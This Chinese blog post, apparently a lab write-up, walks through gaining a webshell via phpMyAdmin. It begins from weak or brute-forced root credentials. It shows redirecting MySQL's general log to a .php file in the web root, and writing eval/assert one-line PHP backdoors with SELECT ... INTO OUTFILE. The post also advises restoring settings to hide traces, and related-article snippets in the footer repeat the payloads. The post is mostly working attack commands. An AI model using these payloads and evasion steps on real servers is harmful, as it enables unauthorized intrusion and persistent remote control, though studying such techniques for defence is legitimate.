【渗透】phpMyAdmin 上传 webshell 拿后台权限

最新推荐文章于 2022-11-25 12:51:37 发布
最新推荐文章于 2022-11-25 12:51:37 发布
阅读量1.7k 收藏 19
点赞数 2
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43427482/article/details/113801647
版权

起序:渗透测试的时候遇到了,复现总结一下。

一、靶场环境

  • VMware Workstation 15.5 Pro
  • windows server 2003
  • phpStudy 2018

二、两种方式

  1. 利用日志文件写入一句话木马
  2. 写入一句话木马生成文件(实际操作时会遇到困难)

1、利用日志文件写入一句话木马

日志文件写入 的思路利用 MySQL 的一个日志文件。我们执行的每一个 sql 语句都会被保存到日志中,换个思路想一下如果把这个日志文件重名为 *.php,然后我们再执行一次 sql语句,那么就会被保存在这个 *.php 文件中,这样我们就能顺利拿到 webshell。

1、进入 phpMyAdmin 控制界面

假设已经通过某种方式得到了 phpMyAdmin 的账号密码。

  • 爆破
  • 弱口令(root:root)

在这里插入图片描述

2、查看日志文件路径

变量 栏的搜索框中输入 gen。会出现 general loggeneral log file 两个变量。因为要将 一句话木马 写入日志文件,所以需要先开启记录日志,将 OFF 改成 ON。日志路径中需要将 *.log 后缀改成 *.php。(特别注意的是,拿到 webshell 之后要改回去,不然就可能被发现了,尽量在拿到 webshell 之后,不要留下痕迹。)

  • general log:指是否启动记录日志;(OFF:否 | ON:是)
  • general log file:指日志路径。

在这里插入图片描述

3、修改日志文件路径

可以用 sql 语句 更改,也可以手动更改。

# 日志保存状态开启
SET global general_log = "ON";
# 修改日志的保存位置
SET global general_log_file='E:/phpStudy/PHPTutorial/WWW/shell.php';

在这里插入图片描述

查看 general loggeneral log file 变量表示的内容。可以看到已经更改完成。

在这里插入图片描述

4、写入一句话木马

SQL 栏中写入下面任选其一即可,然后点击执行。

# eval
select "<?php eval($_POST['shell']);?>";
# assert
select '<?php assert($_POST["shell"]);?>';

在这里插入图片描述

5、查看生成的日志文件

执行完上面过程之后,此时会在网站根目录 E:\phpStudy\PHPTutorial\WWW 下生成了一个 shell.php 的日志文件。

在这里插入图片描述

查看 shell.php 文件内容。可以看到一句话木马已经写入了。

在这里插入图片描述

6、浏览器测试

在这里插入图片描述

7、远程连接

我这里用 中国蚁剑 连接。

在这里插入图片描述在这里插入图片描述

2、写入一句话木马生成文件

1、查看 secure_file_priv 状态

在进行这个方式之前,先查看 secure_file_priv 的状态,来确定数据库是否允许导入文件。

  • secure_file_priv 有三种状态:
    • secure_file_privNULL 时,表示不允许导入导出;
    • secure_file_priv指定文件夹 时,表示 mysql 的导入导出只能在指定的文件夹;
    • secure_file_priv 没有设置时,则表示没有任何限制;
show global variables like "secure_file_priv";

在这里插入图片描述

从上图可知,secure_file_privNULL,这样的情况下是无法插入一句话的,需要修改 secure_file_priv='' 才能插入一句话。此时 secure_file_priv 的状态是无法在 phpMyAdmin 控制界面更改的,所以遇到这种情况之后,这个方法就行不通了。如果运气好的话,可能在渗透测试中遇到 secure_file_priv='' 的情况,那就可以执行了。比如下面图片:

在这里插入图片描述

2、查看网站绝对路径

写入一句话木马之前,必须得知道网站的根目录,不然都不知道往哪儿写。从下面查看的内容可知,根据经验可知,该网站是用 phpstudy 搭建的(假设之前不知道哈),这就很容易判断出网站的根目录是 E:/phpStudy/PHPTutorial/WWW

select @@basedir;

在这里插入图片描述

尝试插入 sql 语句。执行后会发现错误:MySQL服务器使用 --secure file priv 选项运行,因此无法执行此语句

select '<?php @eval($_POST[shell]);?>' into outfile 'E:/phpStudy/PHPTutorial/WWW/shell.php';

在这里插入图片描述

3、更改 secure_file_priv 状态

如何解决这个问题呢?因为是无法在 phpMyAdmin 控制界面更改的。所以只能修改在 E:\phpStudy\PHPTutorial\MySQL 目录下的 my.ini 文件,然后重启服务即可。在 my.ini 文件中,应该是没有 secure-file-priv='' 这个配置的,需要手动添加上。

  • 注:别忘了重启 phpstudy

在这里插入图片描述

3、写入一句话木马

此时再执行 sql 语句 写入一句话木马到 E:\phpStudy\PHPTutorial\WWW 下的 shell.php 文件内,是可以执行成功了。

select "<?php @eval($_POST['shell']);?>" into outfile 'E:/phpStudy/PHPTutorial/WWW/shell.php';

在这里插入图片描述

4、查看生成的文件

执行完上面过程之后,此时会在网站根目录 E:\phpStudy\PHPTutorial\WWW 下生成了一个 shell.php 的日志文件。

在这里插入图片描述

查看 shell.php 文件内容。可以看到一句话木马已经写入了。

在这里插入图片描述

5、远程连接

就不再 浏览器测试了,直接远程连接就行了。

在这里插入图片描述
如果对您有帮助,点个赞再走吧。

边扯边淡
关注
  • 2
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
phpmyadmin上传Webshell总结
afei001
08-31 496
目录 1.select查询输出webshell (1)创建表并INTO OUTFILE写入一句话 (2)select ... INTO OUTFILE写入一句话 2.通过构造命令执行拿shell (1)构造命令执行 (2)命令执行使用system()函数报错解决 3.secure_file_priv值不为空解决办法 4.通过数据库日志写入webshell (1)通过查询日志写入webshell (2)通过慢查询日志写入webshell 5.菜刀连接Windows和Linux系统区别
phpmyadmin上传Webshell总结.docx
08-31
这里详细总结了phpmyadmin上传Webshell的方法,和利用条件,欢迎大家下载。有什么问题可以私聊我,一起探讨。
利用phpMyAdminwebshell
05-01
利用phpMyAdminwebshell 利用phpMyAdminwebshell
通过phpMyAdminwebshell
andiao1218的博客
01-30 367
general_log默认为关闭的,root权限开启后,general_log_file会保存所有的查询语句 所以可以开启general_log,然后设置general_log_file为一个php文件,最后用一句话木马进行查询来获取webshell 进入phpMyAdmin后在SQL处执行SQL语句 首先查看general log是否开启 show variables li...
PHPmyadmin获取权限
qq_45566117的博客
12-07 410
一、PHPmyadmin账号和密码 二、phpmyadminshell的两种方法 1、低版本:SELECT “<?php @assert($_REQUEST["admin"]);?>” INTO OUTFILE ‘/网站绝对路径/shell.php’ 2、高版本:show variables like ‘%secure%’ show variables like ‘%general%’ set global general_log=‘on’; SET global general_log_f
mysql 上传 phpmyadmin_phpmyadmin上传webshell
weixin_39610468的博客
01-19 104
前言在渗透测试过程中获取phpmyadmin的账号和密码,该如何上传webshell环境准备windows server 2008 ip:192.168.2.128php 5.6.27mysql 5.5.53apache 2.4查看数据库是否允许导入文件使用爆破等手段,获得用户名和密码为root root接下来我们需要查看secure_file_priv的状态来确定是否允许导入文件sec...
phpmyadmin中为站点设置mysql权限的图文方法
09-11
在一个服务器上一般来讲都不止一个站点,更不止一个MySQL(和PHP搭配之最佳组合)数据库。
phpMyadmin 用户权限中英对照
10-29
在登陆phpmyadmin时选择了“中文 – Chinese Simplified“,那么就有中文的管理界面了,虽然在phpmyadmin中显示的用户权限显示的还是英文的,但是鼠标放上去时,有中文的提示,这里把phpmyadmin v3.2.4中英文对照表...
利用phpmyadmin设置mysql的权限方法
09-09
主要介绍了如何利用phpmyadmin设置mysql的权限方法,需要的朋友可以参考下
phpmyadmin 后台webshell
黄×的技术bolg
03-08 533
1:phpmyadmin 后台webshellphpmyadmin爆路径方法 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.phphttp://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径D:\usr\www\html\phpMyAdmin\----start code---Cr...
渗透后台扫描
01-30
扫描后台地址扫描目录。。。。。。。。。。。。。。。。。
通过phpMyAdmin写入MySQL,获取webshell
菜鸟-传奇
04-19 217
通过phpMyAdmin写入MySQL,获取webshell 在SQL的控制台中输入 进入http://127.0.0.1/phpMyAdmin,并在SQL中输入如下命令 select '<?php @eval($_POST[1]);?>' into outfile 'D:/phpstudy_pro/WWW/code/sql/shell.php'; 发现如下报错: 修改配置...
phpmyadmin权限
kzyyx的博客
08-31 768
标题phpmyadmin权限 挺垃圾的一个网站通过弱口令root进入后台。 最主要还能直接直行根目录下phpinfo查看网站绝对路径。 1.首先尝试执行outfile语句写入一句话木马 报错显示说是数据库正在运行–secure_file_priv选项,无法执行outfile这个语句。感觉在这个参数上做了限制。 这是secure_file_priv参数的说明。 2.执行show variables like “%secure%”; 查看配置 回显设置为NULL,没有做限制。暂时不知道原因,后续懂了做补
PhpMyadmin后台webshell方法总结
浅笑996的博客
06-29 3713
前言: phpmyadmin后台webshell的方法主要分为两个方法: (1) 、通过日志文件拿webshell; (2) 、利用日志文件写入一句话;(这个方法可能在实际操作中会遇到困难); 本地搭建环境: Phpmystudy 2018 PHP--5.5.38 一、日志文件写入一句话来获取webshell: (1) 、首先我们先利用日志文件写入一句话来获取webshell,日志文件写入的思路利用mysql的一个日志文件。我们执行的每一个sql语句都会被保存到日志中,换个思路想一下把这个
phpmyadmin新姿势getshell
Au
11-03 6565
百度百科:phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HT...
拿到webshell后的提权详解
zdy8023的博客
04-09 9362
首先在提权之前,我们先得清楚什么是提权; 提权主要针对在网站测试过程中,当测试某一个网站是,通过各种漏洞提升webshell权限已夺得改服务器权限。 那么网站拿到webshell各脚本文件对应的权限分别是什么呢? asp/php 服务器的匿名访问权限 aspx user 权限 jsp 通常是系统权限 了解这些之后,接下来的事情就是收集信息 1.服务器内网与外网信息 2.服务器系统...
三个sql语句拿下phpmyadminshell
rhsy445566的专栏
07-13 885
三个sql语句拿下phpmyadminshell首先要知道路径一句一句的执行--------------------------------------------------------- set global general_log='on'; --------------------------------------------------------- SET global gener...
实战渗透--一次对后台登录系统的简单渗透测试
tzyyyyyy的博客
11-25 4237
记录一次网页后台登录系统的渗透测试实战 拿到目标后台的管理员登录密码 以管理员身份进入后台
实战渗透-一次拿到webshell后艰难的提权
qq_29437513的博客
07-25 2055
记上一篇,拿到webhshell后,数据库是dba, 本地上传一个cmd.exe组件上去后,执行失败 网上很多说改路径,写的也写不明白,想到之前迪哥用过的大马提权, 环境是php,但支持asp,有iis组件, 发现 D://recycle可写,传一个cmd.com组件执行命令 权限真的很小,是 nt service 网络用户权限,ns的权限是不能执行net的 支持的组件,提权的时候用的找 ===================== 查看systeminfo,发现有200多个补丁,准备打溢出,目标机是可以
phpmyadmin 账号 数据库权限
最新发布
07-25
PHPMyAdmin是一个用于管理MySQL数据库的开源工具。在PHPMyAdmin中,账号和数据库权限是独立的。 要设置账号的数据库权限,可以按照以下步骤操作: 1. 打开PHPMyAdmin,并登录到您的MySQL服务器。 2. 在导航栏中选择“权限”选项卡。 3. 在权限页面上,您将看到已经存在的用户账号列表。如果您想更改一个现有账号的权限,可以选择相应的账号进行编辑。如果您想创建一个新的账号,请点击“添加新用户”按钮。 4. 在编辑或创建账号的页面上,您可以设置各种权限。以下是一些常见的权限选项: - 全局权限:这些权限适用于所有数据库。 - 数据库权限:这些权限适用于特定的数据库。 - 表权限:这些权限适用于特定的表。 - 列权限:这些权限适用于特定的列。 您可以根据您的需求选择适当的权限。一旦您完成了设置,点击“应用更改”按钮保存更改。 请注意,为了安全起见,只授予账号所需的最低权限。确保只授予必要的访问权限,并定期审查和更新账号的权限设置以保持安全性。 希望以上信息能帮到您!如有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

边扯边淡

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值